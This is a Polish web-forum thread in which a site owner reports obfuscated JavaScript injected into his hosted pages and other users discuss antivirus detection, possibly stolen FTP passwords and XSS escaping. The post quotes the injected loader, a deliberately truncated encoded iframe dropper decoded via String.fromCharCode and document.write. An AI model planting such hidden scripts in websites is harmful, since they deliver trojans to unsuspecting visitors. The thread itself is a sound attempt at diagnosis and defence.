[JS] złośliwy kod

0

Witam. Mam taki problem. W piątek umieściłem stronę na serwerze firmowym (nazwa.pl) dzisiaj patrzę a strona jest rozjechana. Po zbadaniu kodu strony okazało się, że został dodany oto taki kod:

<script type="text/javascript">var GdpldPBsdvjorQSwfbuS = "kw60kw105kw102kw114kw97kw109kw101kw32kw119kw105kw100kw116kw104kw61kw34kw52kw56kw .................. gOdsCliGvQnAiIwQxpeN++){ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);}document.write(ERVwiosNQnfsmlwIqxQG)</script>

Po przebadaniu reszty stron znajdujących się na serwerze w prawie wszystkich przypadkach tez kod był dodany do strony, ale za znacznikiem </html> i przez to strona się nie rozjeżdżała.

Z tego co już się zorientowałem to niby problem związany z hasłami przechowywanymi w TC, bo niby jakiś robal wykrada te hasła... ale to ja się zapytam może jaki to musi być super robal jeśli nod nic nie wykrył?
Czy to może jakaś wymówka usługodawców aby się nie przyznać do tego, że to im się wkradło jakieś coś?

0

NOD się zeszmacił, kiedyś był świetny, ale teraz to ciężko...
Możliwe też że masz coś w kodzie PHP. Już kilka takich przypadków było na forum.

0

Avast wykrywa HTML:IFrame-EJ [Trj] po wejściu na tą stronę (na forum.4p).

Pozwoliłem sobie dziabnąć lekko ten kod, aby nie nadawał się do wykorzystania ;-)

0

Nie dopuszczaj do dopisywania znaków '>' i '<' do strony przez użytkowników. Jest to zabezpieczenie przed atakiem CSS (cross site scripting). Tekst wpisany przez użytkownika zamieniaj na serwerze. '<' na '<' i '>' na '>'
Wtedy nie zostaną one potraktowane jako znaki sterujące języka java script i nie zostaną one wykonane.

Moja strona
http://gry-planszowe.waw.pl

0

11-05-2009 09:44

Szczególnie że to nie jest atak CSS tylko XSS :P

0

Jaki by nie był wszystko co wpisuje użytkownik a następnie będzie to wyświetlane na stronie nalezy przepuszczac przez htmlspecialchars.

Haker pożyteczny człowiek, poszpera, pogmera, coś znajdzie i powiadomi autora kodu.

0
Mariusz J napisał(a)

Nie dopuszczaj do dopisywania znaków '>' i '<' do strony przez użytkowników. Jest to zabezpieczenie przed atakiem CSS (cross site scripting). Tekst wpisany przez użytkownika zamieniaj na serwerze. '<' na '<' i '>' na '>'
Wtedy nie zostaną one potraktowane jako znaki sterujące języka java script i nie zostaną one wykonane.

Moja strona
http://gry-planszowe.waw.pl
A co to ma wspólnego z jego problemem? Bo ja nie rozumiem..

1 użytkowników online, w tym zalogowanych: 0, gości: 1